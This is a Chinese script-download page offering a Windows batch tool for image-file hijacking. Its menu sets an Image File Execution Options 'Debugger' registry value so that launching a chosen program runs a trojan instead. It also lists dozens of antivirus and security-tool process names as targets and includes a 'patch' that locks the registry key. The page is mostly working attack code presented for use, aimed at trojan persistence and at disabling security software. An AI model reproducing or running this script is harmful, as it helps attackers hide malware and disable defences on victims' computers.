Windows映像劫持利用程序bat版下载-脚本之家

热门排行

简介

NT系统在试图执行一个从命令行调用的可执行文件运行请求时，先会检查运行程序是不是可执行文件，如果是的话，再检查格式的，然后就会检查是否存在。。如果不存在的话，它会提示系统找不到文件或者是“指定的路径不正确等等。

[code]
@shift 1
@Echo Off
color f0
title Windows映像劫持利用程序-By Mice
:clearauto
cls
Echo.
Echo                     Windows映像劫持利用程序
Echo.
Echo 制作：Mice Http://WwW.Mice33.Cn
Echo.
Echo 映像胁持的基本原理:
Echo NT系统在试图执行一个从命令行调用的可执行文件运行请求时，先会检查运行程序是不是可执行文件，如果是的话，再检查格式的，然后就会检查是否存在。。如果不存在的话，它会提示系统找不到文件或者是“指定的路径不正确等等。。
Echo.
Echo                [1] 哈哈我来利用咯
Echo                [2] 看看常用杀毒软件进程名称
Echo                [3] 修补漏洞
Echo                [0] 退出
Echo.
Set /p clearslt=        请输入您的选择(1/2/3/0):
If "%clearslt%"=="" Goto clearauto
If "%clearslt%"=="1" Goto clearauto1
If "%clearslt%"=="2" Goto changyong
If "%clearslt%"=="3" Goto budong
If "%clearslt%"=="0" Exit
echo 请选择编号
pause
Goto clearauto

:clearauto1
rem 定义文件名
set /p file1= 请输入你要挟持的文件名(如avp.exe,rav,exe)
set /p file2= 请输入你木马的绝对路径(如c:\windows\xx.exe)
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%file1%] >mice.reg
regedit /s mice.reg & del /q mice.reg

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%file1%" /f /v "Debugger" /t reg_sz /d "%file2%"
del /q cy.txt
cls
Echo 添加成功.赶快把文件名改成%file1%来测试下吧.
pause>nul
Goto clearauto

:changyong
rem 常用软件名
echo 常用杀毒软件 >>cy.txt
echo avp.exe >>cy.txt
echo AgentSvr.exe >>cy.txt
echo CCenter.exe>>cy.txt
echo Rav.exe>>cy.txt
echo RavMonD.exe>>cy.txt
echo RavStub.exe>>cy.txt
echo RavTask.exe>>cy.txt
echo rfwcfg.exe>>cy.txt
echo rfwsrv.exe>>cy.txt
echo RsAgent.exe>>cy.txt
echo Rsaupd.exe>>cy.txt
echo runiep.exe>>cy.txt
echo SmartUp.exe>>cy.txt
echo FileDsty.exe>>cy.txt
echo RegClean.exe>>cy.txt
echo 360tray.exe>>cy.txt
echo 360Safe.exe>>cy.txt
echo 360rpt.exe>>cy.txt
echo kabaload.exe>>cy.txt
echo safelive.exe>>cy.txt
echo Ras.exe>>cy.txt
echo KASMain.exe>>cy.txt
echo KASTask.exe>>cy.txt
echo KAV32.exe>>cy.txt
echo KAVDX.exe>>cy.txt
echo KAVStart.exe>>cy.txt
echo KISLnchr.exe>>cy.txt
echo KMailMon.exe>>cy.txt
echo KMFilter.exe>>cy.txt
echo KPFW32.exe>>cy.txt
echo KPFW32X.exe>>cy.txt
echo KPFWSvc.exe>>cy.txt
echo KWatch9x.exe>>cy.txt
echo KWatch.exe>>cy.txt
echo KWatchX.exe>>cy.txt
echo TrojanDetector.exe>>cy.txt
echo UpLive.EXE.exe>>cy.txt
echo KVSrvXP.exe>>cy.txt
echo KvDetect.exe>>cy.txt
echo KRegEx.exe>>cy.txt
echo kvol.exe>>cy.txt
echo kvolself.exe>>cy.txt
echo kvupload.exe>>cy.txt
echo kvwsc.exe>>cy.txt
echo UIHost.exe>>cy.txt
echo IceSword.exe>>cy.txt
echo iparmo.exe>>cy.txt
echo mmsk.exe>>cy.txt
echo adam.exe>>cy.txt
echo MagicSet.exe>>cy.txt
echo PFWLiveUpdate.exe>>cy.txt
echo SREng.exe>>cy.txt
echo WoptiClean.exe>>cy.txt
echo scan32.exe>>cy.txt
echo shcfg32.exe>>cy.txt
echo mcconsol.exe>>cy.txt
echo HijackThis.exe>>cy.txt
echo mmqczj.exe>>cy.txt
echo Trojanwall.exe>>cy.txt
echo FTCleanerShell.exe>>cy.txt
echo loaddll.exe>>cy.txt
echo rfwProxy.exe>>cy.txt
echo KsLoader.exe>>cy.txt
echo KvfwMcl.exe>>cy.txt
echo autoruns.exe>>cy.txt
echo AppSvc32.exe>>cy.txt
echo ccSvcHst.exe>>cy.txt
echo isPwdSvc.exe>>cy.txt
echo symlcsvc.exe>>cy.txt
echo nod32kui.exe>>cy.txt
echo avgrssvc.exe>>cy.txt
echo RfwMain.exe>>cy.txt
echo KAVPFW.exe>>cy.txt
echo Iparmor.exe>>cy.txt
echo nod32krn.exe>>cy.txt
echo PFW.exe>>cy.txt
echo RavMon.exe>>cy.txt
echo KAVSetup.exe>>cy.txt
echo NAVSetup.exe>>cy.txt
echo SysSafe.exe>>cy.txt
echo QHSET.exe>>cy.txt
echo zxsweep.exe>>cy.txt
echo AvMonitor.exe>>cy.txt
echo UmxCfg.exe>>cy.txt
echo UmxFwHlp.exe>>cy.txt
echo UmxPol.exe>>cy.txt
echo UmxAgent.exe>>cy.txt
echo UmxAttachment.exe>>cy.txt
call cy.txt
Goto clearauto

:budong
setacl.exe "machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /registry /deny administrators /full
setacl.exe "machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /registry /deny system /full
Echo 修补成功.
pause>nul
Goto clearauto
[/code]